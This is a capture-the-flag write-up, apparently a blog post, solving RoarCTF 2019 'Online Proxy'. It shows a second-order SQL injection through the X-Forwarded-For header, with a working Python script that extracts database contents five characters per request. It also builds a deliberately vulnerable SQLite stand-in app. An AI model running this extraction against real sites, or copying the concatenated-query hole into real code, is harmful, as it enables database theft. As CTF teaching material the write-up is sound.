[RoarCTF 2019Online Proxy] SQL clever blind injection

Solution

Viewing the page source shows a Current Ip field:

That naturally suggests X-Forwarded-For to change the IP:

The response echoes the value from the previous request as Last Ip, and a dirsearch scan turned up db.php.

So there is a database behind this: when we send a request with X-Forwarded-For, the last value is echoed back in Last Ip.

There should be SQL injection here.

If we put SQL into XFF on the first request, send some unrelated value on the second request (this is when the SQL gets written into the database and evaluated), and send that same value again on the third request, the stored result is read back out. That is a second-order injection.

We verify that a single quote closes the string:

First XFF: 0' or '114514; second: leekos; third: leekos

In the third response, Last Ip comes back as 114514.

Script

So we write a script:

import requests

url = "http://node4.buuoj.cn:27640/"
dummy = "leekos"   # any fixed value that differs from the payload

def last_ip(session, xff):
    # one request with the given X-Forwarded-For; returns the echoed Last Ip
    r = session.get(url, headers={'X-Forwarded-For': xff})
    start = r.text.find("Last Ip: ") + len("Last Ip: ")
    end = r.text.find(" -->", start)
    return r.text[start:end]

def probe(session, payload):
    # plant the payload, trigger its storage with the dummy value, then read the result
    last_ip(session, payload)
    last_ip(session, dummy)
    return last_ip(session, dummy)

def execsql(sql):
    result = ""
    session = requests.session()
    # '0'|expr|'0' evaluates to expr, so the stored "IP" is the length of the query result
    length = int(probe(session, "0'|length((" + sql + "))|'0"))
    print("[+] length: " + str(length))

    for i in range(1, length + 1, 5):  # five characters per query, neat
        payload = "0'|conv(hex(substr(({}),{},5)),16,10)|'0".format(sql, i)
        res = int(probe(session, payload))
        result += bytes.fromhex(hex(res)[2:]).decode("utf-8")
        print(result)

    return result

# print("databases: " + execsql("select group_concat(schema_name) from information_schema.schemata"))
# print("tables: " + execsql("select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'"))
# print("columns: " + execsql("select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e' and table_schema='F4l9_D4t4B45e'"))
print("flag: " + execsql("select group_concat(`F4l9_C01uMn`) from F4l9_D4t4B45e.F4l9_t4b1e"))

Script analysis

This script is clever. Unlike the blind-injection scripts I had seen before, it retrieves several characters per query.

The idea is to convert the substring to hexadecimal, convert that hexadecimal to a decimal number so it can be stored and echoed as an "IP", read the number out, convert it back to hexadecimal, and finally back to a string, using

Conversion between string and hexadecimal

For example:

hex('abc') = 616263, and conv(hex('abc'),16,10) = 6382179: the SQL function converts the hexadecimal form of abc into decimal.

In MySQL a hexadecimal literal is itself a string, so 0x616263 is displayed as abc.

This approach greatly speeds up the extraction!

bytes.fromhex() turns a string of hex digits into bytes, and decode() turns those bytes into characters.

The point of the whole script is as follows:

payload = "0'|conv(hex(substr(({}),{},5)),16,10)|'0".format(sql,i)

res = int(r.text[start:end])
result += bytes.fromhex(hex(res)[2:]).decode("utf-8")

First the SQL query takes a five-character slice of the result, converts it to hexadecimal, and then to a decimal number.

Then the number is read out of the response with requests, converted back to hexadecimal, and finally to characters.

In this way several characters are retrieved per query.
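As an added example (not the writeup's code, and not the challenge's real db.php, which the page does not show), here is an offline stand-in for the whole flow: a constructed vulnerable "proxy" that reproduces the plant / trigger / read pattern, and the chunked extraction run against it. Assumptions: the app model (X-Forwarded-For remembered per session and inserted by string concatenation on the next request with a different value, newest row echoed as Last Ip) is a guess that matches the three-request behaviour described above; SQLite stands in for MySQL, with conv() registered by hand because SQLite lacks it; the table and column names reuse the writeup's without the database prefix; the flag value is made up.

```python
import sqlite3

CHUNK = 5  # characters per request; MySQL CONV() works at 64-bit precision, so at most 8 ASCII bytes fit


def _conv(n, from_base, to_base):
    """Emulates MySQL CONV(N, from_base, to_base) for the one case the trick needs (hex -> decimal)."""
    if to_base != 10:
        raise ValueError("only to_base=10 is emulated")
    value = int(str(n), from_base)
    if value.bit_length() > 64:
        # MySQL CONV() cannot represent more than 64 bits; treating it as an
        # error here is an assumption, real MySQL does not raise.
        raise ValueError("chunk does not fit in 64 bits; lower CHUNK")
    return str(value)


class VulnerableProxy:
    """Constructed stand-in for the challenge app (db.php is not shown on the page).

    The X-Forwarded-For value is remembered per session; when a later request carries
    a different value, the remembered one is inserted into ip_log by string
    concatenation. Last Ip is the newest ip_log row, read before that insert, which
    is why the result only shows up on the third request."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:", isolation_level=None)  # autocommit
        self.db.create_function("conv", 3, _conv)  # SQLite has hex()/substr()/length(), not conv()
        self.db.executescript(
            "CREATE TABLE ip_log (id INTEGER PRIMARY KEY, ip TEXT);"
            "CREATE TABLE F4l9_t4b1e (F4l9_C01uMn TEXT);"  # no schema prefix: SQLite has none
            "INSERT INTO F4l9_t4b1e VALUES ('flag{constructed_sample_value}');"  # constructed flag
        )
        self.session_ip = None

    def handle(self, xff):
        """One HTTP request; returns the page source including the Last Ip comment."""
        row = self.db.execute("SELECT ip FROM ip_log ORDER BY id DESC LIMIT 1").fetchone()
        last_ip = row[0] if row else ""
        if self.session_ip is not None and self.session_ip != xff:
            # The bug: the remembered value goes into the query unescaped, so a
            # payload planted on one request executes on the next one.
            self.db.execute("INSERT INTO ip_log (ip) VALUES ('" + self.session_ip + "')")
        self.session_ip = xff
        return "<!-- Current Ip: " + xff + " -->\n<!-- Last Ip: " + str(last_ip) + " -->"


def read_last_ip(body):
    """Same parsing the writeup's script does on the HTTP response."""
    start = body.find("Last Ip: ") + len("Last Ip: ")
    end = body.find(" -->", start)
    return body[start:end]


def probe(app, payload, dummy="leekos"):
    """Plant the payload, trigger its INSERT with a dummy value, read the stored result."""
    app.handle(payload)
    app.handle(dummy)
    return read_last_ip(app.handle(dummy))


def extract(app, sql, chunk=CHUNK):
    """Chunked blind extraction: '0'|expr|'0' evaluates to expr, so the stored
    "IP" is the number the expression produced."""
    length = int(probe(app, "0'|length((" + sql + "))|'0"))
    result = ""
    for i in range(1, length + 1, chunk):
        payload = ("0'|conv(hex(substr((" + sql + ")," + str(i) + "," + str(chunk)
                   + ")),16,10)|'0")
        packed = int(probe(app, payload))
        # Unpack the big-endian integer back into its bytes; int.to_bytes recovers
        # them without going through a hex string at all.
        result += packed.to_bytes((packed.bit_length() + 7) // 8, "big").decode("utf-8")
    return result


if __name__ == "__main__":
    app = VulnerableProxy()
    print(extract(app, "select group_concat(F4l9_C01uMn) from F4l9_t4b1e"))
```

Two caveats the packing relies on: conv() is 64-bit, so a chunk must never exceed 8 bytes, and substr() counts characters while hex() counts bytes, so a result containing multi-byte UTF-8 characters can push a 5-character chunk past that limit. With ASCII-only data (as in this challenge) 5 characters are 40 bits and the trick is safe.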


Origin blog.csdn.net/qq_61839115/article/details/132199136